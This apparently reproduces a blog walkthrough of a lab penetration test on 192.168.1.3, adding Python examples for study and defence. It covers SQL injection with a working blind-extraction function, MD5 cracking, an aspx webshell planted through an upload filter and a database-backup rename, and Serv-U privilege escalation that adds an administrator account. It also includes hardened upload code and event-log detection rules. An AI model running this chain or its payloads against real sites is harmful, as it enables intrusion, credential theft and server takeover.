Complete web penetration test experiment

Principle of SQL injection: (figure not reproduced)
Penetration testing process: (figure not reproduced)

  • When files are uploaded, if the server-side script does not strictly validate and filter them, an attacker can upload arbitrary files and so take control of the whole website, and possibly the server. Such a malicious script file (php, asp, aspx, jsp, etc.) is called a WebShell.
  • A WebShell is a command execution environment in the form of a web file such as asp, php, jsp or cgi; it is also called a web backdoor.
  • After compromising a website, the attacker usually mixes these asp or php backdoor files with the normal page files in the web directory of the server, then opens them in a browser to obtain a command execution environment and so control the server (upload, download or modify files, operate the database, execute arbitrary commands, and so on).
  • Privilege escalation means raising the current privileges: once you have a WebShell (control of the site), you try to go further and obtain control of the operating system itself.

Experimental steps

Check the security of the website

Open the link "http://192.168.1.3/see.asp?ID=461&titleID=86", append a single quote (') to the end, and the page returns an error, as shown in the figure below.

As the figure shows, after entering ' the site responds directly with a database error page; the first reaction is that the site has an injection vulnerability. Next enter http://192.168.1.3/see.asp?ID=461&titleID=86 and 1=1, as shown below:
Then enter http://192.168.1.3/see.asp?ID=461&titleID=86 and 1=2, and the site returns the error page. In general, when appending "and 1=1" and "and 1=2" to the URL produces different pages, and the stray quote produced a database error, the parameter is being concatenated into a SQL query and the site has a SQL injection vulnerability, as shown in the following figure. The "and 1=1" page matching the original while the "and 1=2" page differs is exactly the true/false difference that boolean-based injection tools rely on.

Use an injection tool to recover the administrator username and password

Open the "Ah D injection tool", paste the URL containing the injection point into it, select "SQL injection detection" on the left and click "Detect". If the site is injectable the tool reports it below, together with the database type. Then select "Detect tables" to enumerate the table names in the database, as shown in the following figure:
Select the "admin" table and then "Detect fields". The admin table is chosen because the administrators' usernames and passwords are almost always stored there, as shown in the following figure:
Select the "password" and "admin" fields and then "Detect content" to read the other side's username and password, as shown in the figure below. At this point the site's administrator username and password hash have been recovered.
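The quote / "and 1=1" / "and 1=2" test above and the tool's "detect tables", "detect fields" and "detect content" steps are the same technique, boolean-based injection. The following Python is an added example written for this page, not code from the write-up or from the Ah D tool. It stands in for see.asp with an in-memory SQLite table (the real site is ASP over a JET/Access database), so the table names, columns and rows, including the admin row, are constructed; the injection mechanics are the same. It also shows that a parameterised version of the same page fails the test.

```python
import sqlite3

# Constructed stand-in for see.asp. The real site is an ASP page over an
# Access/JET database; here an in-memory SQLite table plays that role, and
# the query is built by string concatenation, which is the defect that makes
# "titleID=86 and 1=1" and "titleID=86 and 1=2" return different pages.
_db = sqlite3.connect(":memory:")
_db.executescript("""
CREATE TABLE article(ID INTEGER, titleID INTEGER, body TEXT);
INSERT INTO article VALUES (461, 86, 'Welcome to the site');
CREATE TABLE admin(username TEXT, password TEXT);
INSERT INTO admin VALUES ('linhai', 'e10adc3949ba59abbe56e057f20f883c');
""")


def see_asp_vulnerable(ID: str, titleID: str) -> str:
    """Vulnerable page: the query-string values are pasted into the SQL."""
    sql = f"SELECT body FROM article WHERE ID={ID} AND titleID={titleID}"
    try:
        row = _db.execute(sql).fetchone()
    except sqlite3.Error as e:
        return f"Database error: {e}"             # the error page a stray quote produces
    return row[0] if row else "Record not found"  # the page 'and 1=2' produces


def see_asp_fixed(ID: str, titleID: str) -> str:
    """Fixed page: same query with bound parameters; probes cannot change its shape."""
    try:
        row = _db.execute("SELECT body FROM article WHERE ID=? AND titleID=?",
                          (int(ID), int(titleID))).fetchone()
    except ValueError:
        return "Bad request"
    return row[0] if row else "Record not found"


def is_injectable(page, ID="461", titleID="86") -> bool:
    """The manual test from the write-up: a quote, then 'and 1=1', then 'and 1=2'."""
    base = page(ID, titleID)
    quote = page(ID, titleID + "'")
    true_ = page(ID, titleID + " and 1=1")
    false_ = page(ID, titleID + " and 1=2")
    # Injectable when the tautology leaves the page unchanged, the contradiction
    # changes it, and the stray quote provokes an error rather than a normal page.
    return true_ == base and false_ != base and quote != base


def blind_extract(page, column, table, max_len=40, ID="461", titleID="86") -> str:
    """What an injection tool's 'detect content' step does underneath: recover a
    value one character at a time from true/false page differences. A binary
    search over printable ASCII needs about seven requests per character."""
    base = page(ID, titleID)

    def holds(cond: str) -> bool:
        return page(ID, f"{titleID} and ({cond})") == base

    value = ""
    for pos in range(1, max_len + 1):
        code = f"(SELECT unicode(substr({column},{pos},1)) FROM {table})"
        if not holds(f"{code}>=32"):   # past the end: substr() is '' and unicode('') is NULL
            break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if holds(f"{code}>{mid}"):
                lo = mid + 1
            else:
                hi = mid
        value += chr(lo)
    return value


if __name__ == "__main__":
    print("vulnerable page injectable:", is_injectable(see_asp_vulnerable))
    print("fixed page injectable:     ", is_injectable(see_asp_fixed))
    print("admin username:", blind_extract(see_asp_vulnerable, "username", "admin"))
    print("admin password:", blind_extract(see_asp_vulnerable, "password", "admin"))
```

The `unicode()`/`substr()` pair is SQLite's spelling; against JET/Access the same loop would use `ASC(MID(...))`, which is what the tool hides behind "detect content". Note that `is_injectable` compares whole page bodies, so on a real site dynamic content (timestamps, ad slots) has to be stripped first or the "and 1=1" page will never match the baseline.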

Use tools to crack MD5 password

The administrator password we obtained is stored as an MD5 hash, which can be attacked with the tool MD5crack. The tool runs a dictionary attack: it hashes each candidate word and compares the result with the target value. As shown in the figure below, paste the MD5 value into the tool and it recovers the plaintext automatically. At this point we have the plaintext of the site's administrator password: 123456. An unsalted MD5 of a weak password like this falls to a dictionary in seconds, which is why it is so easily recovered.

Find and log in to the website management backend

With the administrator's username and password in plaintext, we now need to reach the backend. The Yujian backend scanning tool can be used to find the admin path: open it, enter the target site and click start, as shown in the figure.
The scan shows that the backend address is http://192.168.1.3/admin/login.asp.
Open the backend, as shown in the following figure:
Enter the cracked administrator username linhai and password 123456 and log in to the backend successfully, as shown in the following figure:

Get a webshell on the website

Now that we are in the management backend, we need a webshell in order to keep persistent access to the site. Open "Article management" and then the image upload dialog, as shown in the following figure:

Upload the aspx Trojan directly; the result is shown in the following figure:
Change the Trojan's extension: the file was originally named mm.aspx, rename it to mm.jpg and upload again. This time the upload succeeds, as shown in the following figure:
After the upload succeeds, right-click the image, open its properties to see the path it was stored under, and note it down, as shown in the following figure:
Once uploaded, the file can be renamed into an executable script via the database backup feature, so that it runs as a Trojan script. Open "Data management" on the left side of the site and select "Backup/Restore database".
In the backup form, enter the path of the image just uploaded as the database path and "…/db/1.aspx" as the backup path, so that the backup is written as an aspx file and the Trojan can run, as shown in the figure:
After clicking backup, http://192.168.1.3/db/1.aspx is the Trojan's address. The Trojan's password is 77169. We now have a webshell on the site, as shown in the figure:
The upload filter only looked at the extension, and the backup feature copied the uploaded picture to a name of the attacker's choosing; it is the combination of the two that yields script execution.
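The two weaknesses chained above, an extension-only upload filter and a backup feature that writes to any name, next to hardened versions of both. This is an added example written for this page, not code from the CMS in the write-up; the directory names uploadfile/ and db/, the function names and the payload bytes are assumptions, and the upload and backup logic are reconstructed from the behaviour the steps describe.

```python
import os
import secrets
import shutil
import tempfile

SCRIPT_EXT = {".asp", ".aspx", ".asa", ".ashx", ".asmx", ".cer", ".cdx", ".php", ".jsp"}
IMAGE_EXT = {".jpg", ".jpeg", ".png", ".gif"}
IMAGE_MAGIC = {b"\xff\xd8\xff": {".jpg", ".jpeg"}, b"\x89PNG\r\n\x1a\n": {".png"},
               b"GIF87a": {".gif"}, b"GIF89a": {".gif"}}
# Constructed payload standing in for the uploaded mm.aspx / mm.jpg.
TROJAN_BYTES = b'<%@ Page Language="C#" %><% /* webshell body omitted */ %>'


def _write(path: str, data: bytes) -> str:
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f:
        f.write(data)
    return path


def upload_extension_only(webroot, name, data) -> str:
    """The filter the write-up bypasses: only the extension is examined."""
    if os.path.splitext(name)[1].lower() in SCRIPT_EXT:
        raise PermissionError("script files may not be uploaded")
    return _write(os.path.join(webroot, "uploadfile", os.path.basename(name)), data)


def backup_unrestricted(webroot, src_rel, dst_rel) -> str:
    """'Backup/Restore database' as abused: any source copied to any destination,
    which is what turns uploadfile/mm.jpg into db/1.aspx."""
    dst = os.path.join(webroot, dst_rel)
    os.makedirs(os.path.dirname(dst), exist_ok=True)
    shutil.copyfile(os.path.join(webroot, src_rel), dst)
    return dst


def _inside(root, path) -> bool:
    root, path = os.path.realpath(root), os.path.realpath(path)
    return os.path.commonpath([root, path]) == root


def upload_hardened(webroot, name, data) -> str:
    """Image extensions only, magic bytes must agree with the extension, obvious
    script markers are refused, and the server chooses the stored name."""
    ext = os.path.splitext(name)[1].lower()
    if ext not in IMAGE_EXT:
        raise PermissionError("only image uploads are accepted")
    if not any(data.startswith(m) and ext in exts for m, exts in IMAGE_MAGIC.items()):
        raise PermissionError("content does not match extension")
    if b"<%" in data or b"<?" in data:   # coarse polyglot check; re-encoding the image is the stronger fix
        raise PermissionError("script markers inside image")
    return _write(os.path.join(webroot, "uploadfile", secrets.token_hex(8) + ext), data)


def backup_restricted(webroot, src_rel, dst_rel) -> str:
    """Source and destination confined to db/, destination name flattened,
    and only .mdb/.bak may be written."""
    dbdir = os.path.join(webroot, "db")
    src = os.path.join(webroot, src_rel)
    dst = os.path.join(dbdir, os.path.basename(dst_rel.replace("\\", "/")))
    if not (_inside(dbdir, src) and _inside(dbdir, dst)):
        raise PermissionError("backup paths must stay inside db/")
    if os.path.splitext(dst)[1].lower() not in {".mdb", ".bak"}:
        raise PermissionError("backup must be written as .mdb or .bak")
    os.makedirs(dbdir, exist_ok=True)
    shutil.copyfile(src, dst)
    return dst


def run_chain(hardened: bool) -> bool:
    """Replays the write-up's steps in a throwaway webroot: direct upload of
    mm.aspx, then the renamed mm.jpg, then backup to db/1.aspx. True if an
    executable .aspx containing the payload results."""
    webroot = tempfile.mkdtemp()
    up = upload_hardened if hardened else upload_extension_only
    bk = backup_restricted if hardened else backup_unrestricted
    try:
        for name in ("mm.aspx", "mm.jpg"):
            try:
                stored = up(webroot, name, TROJAN_BYTES)
                dst = bk(webroot, os.path.relpath(stored, webroot), "db/1.aspx")
                with open(dst, "rb") as f:
                    return dst.lower().endswith(".aspx") and b"<%@" in f.read()
            except PermissionError:
                continue
        return False
    finally:
        shutil.rmtree(webroot)


def honest_backup_allowed() -> bool:
    """backup_restricted still serves the legitimate db/data.mdb -> db/backup.bak case."""
    webroot = tempfile.mkdtemp()
    try:
        _write(os.path.join(webroot, "db", "data.mdb"), b"\x00\x01")
        return os.path.isfile(backup_restricted(webroot, "db/data.mdb", "db/backup.bak"))
    finally:
        shutil.rmtree(webroot)
```

Either fix alone breaks the chain as described: the content check stops mm.jpg at upload, and the restricted backup refuses both the upload directory as a source and .aspx as a destination. On IIS the upload directory should additionally have script execution disabled, so that even a file that slips through both checks is served as static content.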

Get server permissions

Inside the webshell we need to run DOS commands to add an administrator, so click the "command line" button at the top of the webshell to enter command execution mode, as shown below. Running whoami shows that the shell runs as the network service account. Trying to add an administrator account directly returns a blank response, which shows that this account cannot create users.
Click "Port scan" -> "Scan"; the target has port 43958 open, which is the Serv-U administration service, as shown in the figure. Commands issued through it run with the Serv-U service's own privileges rather than the webshell's:
Click "Serv-U privilege escalation", enter the command "net user aaa 123456 /add" in the cmdshell box and click "Execute", as shown in the figure:
Enter "net localgroup administrators aaa /add" in the cmdshell box and click "Execute", as shown in the figure:
Enter "net user" in the cmdshell box and click "Run" to confirm that the user aaa was added, as shown:
Enter "net user aaa" in the cmdshell box and click "Run" to confirm that aaa is in the Administrators group, as shown:
Click "Start" -> "Run" -> "mstsc", connect to 192.168.1.3, enter the account aaa with password 123456 and click "Login", as shown in the figure:
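A defender's view of the steps above, as an added example that is not part of the original write-up: the account creation and group addition show up in the Windows Security log as events 4720 and 4732, and the whoami/net.exe invocations as process-creation events (4688) whose parent is a service process rather than a user's shell. The events below are constructed for the example, the field names are a flattened simplification of the real log, and the Serv-U process name ServUDaemon.exe is an assumption.

```python
from datetime import datetime, timedelta

# Constructed Windows Security events (not from the write-up's target), flattened
# to dicts. 4688 = process created, 4720 = user account created,
# 4732 = member added to a security-enabled local group.
EVENTS = [
    {"time": "2020-09-27 10:01:02", "id": 4688, "subject": "NT AUTHORITY\\NETWORK SERVICE",
     "process": "C:\\Windows\\System32\\whoami.exe",
     "parent": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "cmdline": "whoami"},
    {"time": "2020-09-27 10:03:10", "id": 4688, "subject": "NT AUTHORITY\\SYSTEM",
     "process": "C:\\Windows\\System32\\net.exe",
     "parent": "C:\\Program Files\\Serv-U\\ServUDaemon.exe",
     "cmdline": "net user aaa 123456 /add"},
    {"time": "2020-09-27 10:03:10", "id": 4720, "subject": "NT AUTHORITY\\SYSTEM", "target": "aaa"},
    {"time": "2020-09-27 10:03:40", "id": 4688, "subject": "NT AUTHORITY\\SYSTEM",
     "process": "C:\\Windows\\System32\\net.exe",
     "parent": "C:\\Program Files\\Serv-U\\ServUDaemon.exe",
     "cmdline": "net localgroup administrators aaa /add"},
    {"time": "2020-09-27 10:03:41", "id": 4732, "subject": "NT AUTHORITY\\SYSTEM",
     "target": "aaa", "group": "Administrators"},
    # Benign noise: a helpdesk account creation with no group change, and a
    # user opening cmd from Explorer.
    {"time": "2020-09-27 11:15:00", "id": 4720, "subject": "CORP\\helpdesk", "target": "jsmith"},
    {"time": "2020-09-27 11:20:00", "id": 4688, "subject": "CORP\\jsmith",
     "process": "C:\\Windows\\System32\\cmd.exe",
     "parent": "C:\\Windows\\explorer.exe", "cmdline": "cmd"},
]

# Service processes that have no business spawning shells or account tools.
# ServUDaemon.exe as the Serv-U service binary is an assumption for this example.
SERVICE_PARENTS = {"w3wp.exe", "inetinfo.exe", "servudaemon.exe"}
ADMIN_TOOLS = {"cmd.exe", "net.exe", "net1.exe", "whoami.exe", "powershell.exe"}


def _leaf(path: str) -> str:
    """Last component of a Windows path, independent of the host OS."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _ts(e: dict) -> datetime:
    return datetime.strptime(e["time"], "%Y-%m-%d %H:%M:%S")


def detect_new_local_admin(events, window=timedelta(minutes=10)) -> list:
    """Pair a 4720 with a later 4732 into Administrators for the same account
    inside `window`: the 'net user /add' then 'net localgroup administrators /add'
    sequence from the write-up."""
    created, hits = {}, []
    for e in sorted(events, key=_ts):
        if e["id"] == 4720:
            created[e["target"].lower()] = e
        elif e["id"] == 4732 and e.get("group", "").lower() == "administrators":
            c = created.get(e["target"].lower())
            if c and _ts(e) - _ts(c) <= window:
                hits.append({"account": e["target"], "created_by": c["subject"],
                             "seconds": int((_ts(e) - _ts(c)).total_seconds())})
    return hits


def detect_service_spawned_tools(events) -> list:
    """Flag 4688 events where a web or FTP service process spawned a shell or an
    account tool: a webshell's command line, and the Serv-U escalation, leave
    exactly this trail. Returns (subject, parent, command line) tuples."""
    return [(e["subject"], _leaf(e["parent"]), e.get("cmdline", ""))
            for e in events
            if e["id"] == 4688 and _leaf(e["parent"]) in SERVICE_PARENTS
            and _leaf(e["process"]) in ADMIN_TOOLS]


if __name__ == "__main__":
    for hit in detect_new_local_admin(EVENTS):
        print("new local admin:", hit)
    for subject, parent, cmd in detect_service_spawned_tools(EVENTS):
        print(f"{parent} spawned [{cmd}] as {subject}")
```

Both rules need command-line auditing (4688 with "Include command line in process creation events") and the account-management audit subcategory enabled; without them the 4688 events carry no command line and the 4720/4732 events are not written at all. The second rule is the higher-value one here, because a SYSTEM-level net.exe with ServUDaemon.exe as parent is abnormal regardless of what account it goes on to create.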

Source: blog.csdn.net/weixin_43916678/article/details/108805219